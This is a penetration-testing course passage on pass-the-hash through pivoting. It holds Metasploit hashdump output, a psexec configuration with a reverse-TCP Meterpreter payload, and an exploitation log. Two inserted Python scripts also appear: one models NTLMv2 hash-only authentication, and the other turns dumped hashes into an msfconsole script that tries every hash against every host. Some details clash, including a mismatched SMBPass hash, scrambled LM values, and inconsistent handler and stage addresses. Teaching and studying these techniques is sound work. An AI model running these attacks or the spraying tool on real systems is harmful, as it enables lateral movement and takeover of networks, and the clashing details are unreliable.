Exploitation through Pivoting

6.5. Exploitation through Pivoting

Pivoting lets us move around the internal target network quickly and easily. We will now leverage that reach to attack and exploit new hosts, which means applying the exploitation skills covered earlier in the course.

This lets us introduce a very powerful attack technique that proves extremely useful during Post Exploitation (and elsewhere): pass the hash.

Windows network authentication (NTLM) never sends the clear-text password. The client proves knowledge of the hashed version of the password (the NT hash, or the LM hash on legacy systems), and that hash is the key used in the challenge-response. Anyone who holds the hash can therefore log on without ever knowing the password.

This opens an attack vector typical of Windows environments.

When the same password is used on multiple hosts within a network and you obtain its hash from one of those hosts, you can authenticate to all the other machines as well, even though you do not know the actual password (for example, because it would take too long to crack).

This works for two reasons: Windows password hashes are unsalted, so the same password produces exactly the same NT hash on every host, and NTLM treats that hash as the secret itself, so the hash is password-equivalent.

Tools and Metasploit modules have been written to exploit this weakness and get the most out of it: arbitrary code execution on the remote host.

Since we have already dumped the hashes from the first compromised machine, if the same user with the same password exists on other machines, we should be able to access all of them.

The beauty of this attack is that we do not even need to crack the hashes to recover the plain-text password. We only need the hashes.
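The following is an added example, not part of the course text and not Metasploit's own code, that shows in working code why the two paragraphs above hold: the NT hash is an unsalted MD4 of the UTF-16LE password, and the NTLMv2 challenge-response (MS-NLMP section 3.3.2) is derived entirely from that hash, so a client holding only the hash produces exactly the response the server expects. The two-host scenario, the user name `els`, the domain `WORKGROUP` and the client blob contents are constructed for the demo; MD4 is implemented inline because OpenSSL 3 builds of Python usually refuse `hashlib.new("md4")`.

```python
"""Why pass-the-hash works, in code.  Added example; not course material and
not Metasploit's implementation.  Scenario, user, domain and blob are constructed."""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (demo quality: fine for a few hashes, useless for cracking)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian

    f = lambda x, y, z: (x & y) | (~x & MASK & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]

    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):                                       # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                       # round 2
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                       # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password.  No salt and no per-host
    secret, so one password gives the same hash on every machine."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_response(nt: bytes, user: str, domain: str,
                    server_challenge: bytes, client_blob: bytes) -> bytes:
    """NtChallengeResponse as the client builds it (MS-NLMP 3.3.2).
    Note the inputs: the NT hash, never the password."""
    ntowfv2 = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"),
                       hashlib.md5).digest()
    nt_proof = hmac.new(ntowfv2, server_challenge + client_blob,
                        hashlib.md5).digest()
    return nt_proof + client_blob


def server_accepts(nt: bytes, user: str, domain: str,
                   server_challenge: bytes, response: bytes) -> bool:
    """What the target (local SAM or DC) does: recompute the proof from the
    hash it stores and compare.  It cannot tell a hash-only client from
    one that typed the password."""
    expected = ntlmv2_response(nt, user, domain, server_challenge, response[16:])
    return hmac.compare_digest(expected, response)


def pass_the_hash_demo(password: str = "password") -> dict:
    """Constructed scenario: the same local password was set on hosts A and B.
    The attacker dumped the hash from A and never learned the password."""
    hash_from_host_a = nt_hash(password)
    hash_stored_on_host_b = nt_hash(password)              # identical: unsalted
    challenge = os.urandom(8)                               # host B's ServerChallenge
    client_blob = (b"\x01\x01" + bytes(6)                   # RespType, HiRespType, reserved
                   + struct.pack("<Q", 0x01D5E0F2A2B3C4D5)  # constructed FILETIME
                   + os.urandom(8) + bytes(4))              # ClientChallenge, reserved
    response = ntlmv2_response(hash_from_host_a, "els", "WORKGROUP", challenge, client_blob)
    return {
        "nt_hash_hex": hash_from_host_a.hex(),
        "same_hash_on_both_hosts": hash_from_host_a == hash_stored_on_host_b,
        "host_b_accepts_hash_only_client": server_accepts(
            hash_stored_on_host_b, "els", "WORKGROUP", challenge, response),
        "host_b_rejects_wrong_hash": not server_accepts(
            nt_hash(password + "!"), "els", "WORKGROUP", challenge, response),
    }


if __name__ == "__main__":
    for key, value in pass_the_hash_demo().items():
        print(f"{key}: {value}")
```

The NT hash of `password`, 8846f7eaee8fb117ad06bdd830b7586c, is the textbook value, so the MD4 can be checked against any hash reference. The server side is the point to notice: it only ever holds the hash, so the only fix for a reused local password is to change it on every host; rotating it on the host you dumped it from does nothing for the others.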

Let us dump the victim's hashes with the hashdump command. Each line has the form user:RID:LM hash:NT hash:::

```
meterpreter > hashdump
Administrator:500:1404e35b51404eeeaad3b4aad3b435b5:d2688ac52a4d9e6bffa7969b74132a4f:::
els:1000:eaad3b435b51404eeaad3b435b51404e:fa796d9e6bfd2688ac52a49b74132a4f:::
eLS_Admin:1002:aad3b435b51404eea40ad3b435b514ee:6d2688ac52a49bd9e6bffa7974132a4f:::
els_user:1001:eaad3b435b51aad3b435b51404e404ee:bffa96d2688ac52a7d9e649b74132a4f:::
Guest:501:d3b435baad3bb51404eeaa54351404ee:6bffa78ac52ad9e96d26849b74132a4f:::
```

As we can see, there are several user accounts we can test for our purpose.

The Metasploit module we use to run the pass-the-hash attack is psexec:

```
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > info

      Name: Microsoft Windows Authenticated User Code Execution
    Module: exploit/windows/smb/psexec

Description:
  This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description.
```

Let's say we want to try the attack using the credentials of the user account els. We configure the module with the following information:

- A payload to use
- The remote host on which to run the attack (RHOST)
- The user account to use (SMBUser)
- The password hash for the account (SMBPass)

These are the commands we run to configure the module. SMBPass takes the LM and NT hashes joined by a colon, exactly as hashdump prints them:

```
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 66.176.44.106
LHOST => 66.176.44.106
msf exploit(psexec) > set RHOST 10.10.10.5
RHOST => 10.10.10.5
msf exploit(psexec) > set SMBUser els
SMBUser => els
msf exploit(psexec) > set SMBPASS aad3b435b51404eeaad3b435b51404ee:d9e6bffa796d2688ac52a49b74132a4f
SMBPASS => aad3b435b51404eeaad3b435b51404ee:d9e6bffa796d2688ac52a49b74132a4f
```

Once again, we will target the host `10.10.10.5`.
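The configuration above is typed by hand for one account and one host. As an added example (not course material and not a Metasploit feature), the script below parses hashdump output into the user:RID:LM:NT fields, spots password reuse between accounts (identical NT hash means identical password, no cracking needed), drops accounts that cannot be passed (blank passwords, which Windows refuses for network logon by default, and the disabled Guest account) and emits an msfconsole resource script that tries every usable hash against every target. The sample dump is constructed and is not the one shown on this page; `RHOSTS` is the current option name, which older consoles, as on this page, spell `RHOST`.

```python
"""hashdump -> psexec pass-the-hash resource script.  Added example; not
course material and not part of Metasploit.  SAMPLE_HASHDUMP is constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "" (blank password)

# hashdump prints one account per line: user:RID:LM hash:NT hash:::
HASHDUMP_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample; the 8846f7... value is the well-known NT hash of "password".
SAMPLE_HASHDUMP = """\
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
els:1000:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def smb_pass(self) -> str:
        """The LM:NT form that psexec's SMBPass option expects."""
        return f"{self.lm}:{self.nt}"


def parse_hashdump(text: str) -> List[Account]:
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("meterpreter"):   # prompt and blank lines
            continue
        m = HASHDUMP_LINE.match(line)
        if not m:
            raise ValueError(f"not a hashdump line: {line!r}")
        user, rid, lm, nt = m.groups()
        accounts.append(Account(user, int(rid), lm.lower(), nt.lower()))
    return accounts


def reuse_groups(accounts: List[Account]) -> Dict[str, List[str]]:
    """Identical NT hash means identical password (no salt), so reuse is
    visible without cracking anything.  Blank passwords are not interesting."""
    by_hash: Dict[str, List[str]] = {}
    for a in accounts:
        if a.nt != EMPTY_NT:
            by_hash.setdefault(a.nt, []).append(a.user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def candidates(accounts: List[Account]) -> List[Account]:
    """Skip blank passwords (refused for network logon by default) and
    Guest (RID 501), which is disabled on a default install."""
    return [a for a in accounts if a.nt != EMPTY_NT and a.rid != 501]


def psexec_resource_script(accounts: List[Account], rhosts: List[str],
                           lhost: str, lport: int = 4444) -> str:
    """Emit an msfconsole resource script (run with: msfconsole -r file.rc)
    that tries every candidate hash against every host, one run at a time
    so the reverse handler on LPORT is never double-bound."""
    lines = [
        "use exploit/windows/smb/psexec",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
    ]
    for a in candidates(accounts):
        for host in rhosts:
            lines += [f"set RHOSTS {host}",
                      f"set SMBUser {a.user}",
                      f"set SMBPass {a.smb_pass}",
                      "run"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    accs = parse_hashdump(SAMPLE_HASHDUMP)
    print("reused passwords:", reuse_groups(accs))
    print(psexec_resource_script(accs, ["10.10.10.5"], "192.168.102.147"))
```

On the constructed dump the reuse check immediately tells you that Administrator and els share a password, which is exactly the condition under which a hash dumped from one host opens the next one.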

Once the module finishes, if the exploit works we obtain a new meterpreter session on the new victim (10.10.10.5):

```
msf exploit(psexec) > exploit

[*] Started reverse TCP handler on 192.168.102.147:4444
[*] Connecting to the server...
[*] Authenticating to 10.10.10.5:445 as user 'els'...
[*] Selecting native target
[*] Uploading payload...
[*] Created \mcRcNNkT.exe...
[*] Sending stage (957487 bytes) to 66.176.44.1
[+] 10.10.10.5:445 - Service started successfully...
[*] Deleted \mcRcNNkT.exe...
```

We have successfully exploited a new host by means of the pass-the-hash technique, and we now have two compromised machines on the target network.

Now that we have full control of the new host, we can start the Post Exploitation process over again from this host in order to gather more information about the organization, its services, hosts, networks, and so on.

Notice that the same steps can be used with almost all other Metasploit modules. For example, if we find a vulnerable service on one of the internal machines, we just need to select and run the correct Metasploit module.

Moreover, remember that you can also run exploits through proxychains. This means that if Metasploit does not offer a module for a specific vulnerability but you have a working exploit, you can pivot it into the internal network via proxychains and socks4a.

(see vid-329)

Conclusion

At this point, you should have the methodology and the skill-set necessary to perform a thorough Penetration test on a remote network.

Make sure to refer to our proposed Post Exploitation process during your engagements and make sure to optimize it and customize it according to the scope and environment of your test.

Now that we have covered all phases of an engagement, the below link is a guide indicating how to properly construct your report.

Reporting guide

(see vid-322) (see vid-323)
